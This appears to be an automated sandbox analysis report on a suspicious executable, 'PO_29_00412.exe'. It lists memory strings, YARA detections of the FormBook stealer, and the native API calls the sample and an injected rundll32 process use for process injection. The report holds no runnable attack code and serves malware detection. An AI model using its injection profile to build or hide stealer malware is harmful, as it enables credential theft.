          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.241224976.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 0_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040548D

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.480594324.0000000000830000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.225535038.0000000003120000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.261451958.0000000000900000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.261351613.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.221080798.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.480879219.0000000000960000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO_29_00412.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO_29_00412.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO_29_00412.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO_29_00412.exe.3120000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO_29_00412.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO_29_00412.exe.3120000.4.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.480594324.0000000000830000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.480594324.0000000000830000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.225535038.0000000003120000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.225535038.0000000003120000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.261451958.0000000000900000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.261451958.0000000000900000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.261351613.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.261351613.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.221080798.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.221080798.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.480879219.0000000000960000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.480879219.0000000000960000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO_29_00412.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO_29_00412.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.PO_29_00412.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.PO_29_00412.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO_29_00412.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO_29_00412.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO_29_00412.exe.3120000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO_29_00412.exe.3120000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.PO_29_00412.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.PO_29_00412.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO_29_00412.exe.3120000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO_29_00412.exe.3120000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: PO_29_00412.exe
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_004181B0 NtCreateFile,1_2_004181B0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00418260 NtReadFile,1_2_00418260
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_004182E0 NtClose,1_2_004182E0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00418390 NtAllocateVirtualMemory,1_2_00418390
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_004181AA NtCreateFile,1_2_004181AA
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_004182DA NtClose,1_2_004182DA
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00AA98F0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00AA9860
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9840 NtDelayExecution,LdrInitializeThunk,1_2_00AA9840
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA99A0 NtCreateSection,LdrInitializeThunk,1_2_00AA99A0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00AA9910
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9A20 NtResumeThread,LdrInitializeThunk,1_2_00AA9A20
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00AA9A00
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9A50 NtCreateFile,LdrInitializeThunk,1_2_00AA9A50
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA95D0 NtClose,LdrInitializeThunk,1_2_00AA95D0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9540 NtReadFile,LdrInitializeThunk,1_2_00AA9540
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00AA96E0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00AA9660
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00AA97A0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9780 NtMapViewOfSection,LdrInitializeThunk,1_2_00AA9780
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9FE0 NtCreateMutant,LdrInitializeThunk,1_2_00AA9FE0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9710 NtQueryInformationToken,LdrInitializeThunk,1_2_00AA9710
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA98A0 NtWriteVirtualMemory,1_2_00AA98A0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9820 NtEnumerateKey,1_2_00AA9820
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AAB040 NtSuspendThread,1_2_00AAB040
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA99D0 NtCreateProcessEx,1_2_00AA99D0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9950 NtQueueApcThread,1_2_00AA9950
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9A80 NtOpenDirectoryObject,1_2_00AA9A80
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9A10 NtQuerySection,1_2_00AA9A10
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AAA3B0 NtGetContextThread,1_2_00AAA3B0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9B00 NtSetValueKey,1_2_00AA9B00
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA95F0 NtQueryInformationFile,1_2_00AA95F0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9520 NtWaitForSingleObject,1_2_00AA9520
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AAAD30 NtSetContextThread,1_2_00AAAD30
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9560 NtWriteFile,1_2_00AA9560
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA96D0 NtCreateKey,1_2_00AA96D0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9610 NtEnumerateValueKey,1_2_00AA9610
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9670 NtQueryInformationProcess,1_2_00AA9670
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9650 NtQueryValueKey,1_2_00AA9650
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9730 NtQueryVirtualMemory,1_2_00AA9730
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AAA710 NtOpenProcessToken,1_2_00AAA710
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9760 NtOpenProcess,1_2_00AA9760
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA9770 NtSetInformationFile,1_2_00AA9770
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AAA770 NtOpenThread,1_2_00AAA770
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_1_004181B0 NtCreateFile,1_1_004181B0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_1_00418260 NtReadFile,1_1_00418260
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_1_004182E0 NtClose,1_1_004182E0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_1_00418390 NtAllocateVirtualMemory,1_1_00418390
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_1_004181AA NtCreateFile,1_1_004181AA
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_1_004182DA NtClose,1_1_004182DA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649540 NtReadFile,LdrInitializeThunk,7_2_04649540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046495D0 NtClose,LdrInitializeThunk,7_2_046495D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04649660
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649650 NtQueryValueKey,LdrInitializeThunk,7_2_04649650
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046496E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_046496E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046496D0 NtCreateKey,LdrInitializeThunk,7_2_046496D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649710 NtQueryInformationToken,LdrInitializeThunk,7_2_04649710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649FE0 NtCreateMutant,LdrInitializeThunk,7_2_04649FE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649780 NtMapViewOfSection,LdrInitializeThunk,7_2_04649780
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649860 NtQuerySystemInformation,LdrInitializeThunk,7_2_04649860
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649840 NtDelayExecution,LdrInitializeThunk,7_2_04649840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_04649910
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046499A0 NtCreateSection,LdrInitializeThunk,7_2_046499A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649A50 NtCreateFile,LdrInitializeThunk,7_2_04649A50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649560 NtWriteFile,7_2_04649560
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649520 NtWaitForSingleObject,7_2_04649520
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0464AD30 NtSetContextThread,7_2_0464AD30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046495F0 NtQueryInformationFile,7_2_046495F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649670 NtQueryInformationProcess,7_2_04649670
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649610 NtEnumerateValueKey,7_2_04649610
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649760 NtOpenProcess,7_2_04649760
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0464A770 NtOpenThread,7_2_0464A770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649770 NtSetInformationFile,7_2_04649770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649730 NtQueryVirtualMemory,7_2_04649730
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0464A710 NtOpenProcessToken,7_2_0464A710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046497A0 NtUnmapViewOfSection,7_2_046497A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0464B040 NtSuspendThread,7_2_0464B040
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649820 NtEnumerateKey,7_2_04649820
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046498F0 NtReadVirtualMemory,7_2_046498F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046498A0 NtWriteVirtualMemory,7_2_046498A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649950 NtQueueApcThread,7_2_04649950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046499D0 NtCreateProcessEx,7_2_046499D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649A20 NtResumeThread,7_2_04649A20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649A00 NtProtectVirtualMemory,7_2_04649A00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649A10 NtQuerySection,7_2_04649A10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649A80 NtOpenDirectoryObject,7_2_04649A80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04649B00 NtSetValueKey,7_2_04649B00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0464A3B0 NtGetContextThread,7_2_0464A3B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006281B0 NtCreateFile,7_2_006281B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00628260 NtReadFile,7_2_00628260
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006282E0 NtClose,7_2_006282E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00628390 NtAllocateVirtualMemory,7_2_00628390
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006281AA NtCreateFile,7_2_006281AA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006282DA NtClose,7_2_006282DA
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403461
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 0_2_004069250_2_00406925
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00408C4B1_2_00408C4B
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00408C501_2_00408C50
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_0041BC561_2_0041BC56
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_0041B4961_2_0041B496
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_0041CD311_2_0041CD31
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A920A01_2_00A920A0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B320A81_2_00B320A8
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A7B0901_2_00A7B090
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B328EC1_2_00B328EC
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B3E8241_2_00B3E824
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B210021_2_00B21002
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A841201_2_00A84120
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A6F9001_2_00A6F900
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B322AE1_2_00B322AE
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9EBB01_2_00A9EBB0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B2DBD21_2_00B2DBD2
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B203DA1_2_00B203DA
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B32B281_2_00B32B28
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A7841F1_2_00A7841F
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B2D4661_2_00B2D466
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A925811_2_00A92581
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A7D5E01_2_00A7D5E0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B325DD1_2_00B325DD
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A60D201_2_00A60D20
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B32D071_2_00B32D07
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B31D551_2_00B31D55
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B32EF71_2_00B32EF7
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A86E301_2_00A86E30
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B2D6161_2_00B2D616
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B31FF11_2_00B31FF1
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B3DFCE1_2_00B3DFCE
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046CD4667_2_046CD466
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0461841F7_2_0461841F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D1D557_2_046D1D55
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04600D207_2_04600D20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D2D077_2_046D2D07
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0461D5E07_2_0461D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D25DD7_2_046D25DD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046325817_2_04632581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04626E307_2_04626E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046CD6167_2_046CD616
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D2EF77_2_046D2EF7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D1FF17_2_046D1FF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046DDFCE7_2_046DDFCE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046DE8247_2_046DE824
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C10027_2_046C1002
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D28EC7_2_046D28EC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046320A07_2_046320A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D20A87_2_046D20A8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0461B0907_2_0461B090
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046241207_2_04624120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0460F9007_2_0460F900
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046BFA2B7_2_046BFA2B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D22AE7_2_046D22AE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0462AB407_2_0462AB40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D2B287_2_046D2B28
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C03DA7_2_046C03DA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046CDBD27_2_046CDBD2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463EBB07_2_0463EBB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00618C4B7_2_00618C4B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00618C507_2_00618C50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0062B4967_2_0062B496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0062CD317_2_0062CD31
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00612D877_2_00612D87
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00612D907_2_00612D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00612FB07_2_00612FB0
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: String function: 0041A090 appears 38 times
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: String function: 00A6B150 appears 39 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0460B150 appears 45 times
          Source: PO_29_00412.exe, 00000000.00000003.219519129.0000000003296000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO_29_00412.exe
          Source: PO_29_00412.exe, 00000001.00000002.261401303.0000000000609000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs PO_29_00412.exe
          Source: PO_29_00412.exe, 00000001.00000002.261873134.0000000000CEF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO_29_00412.exe
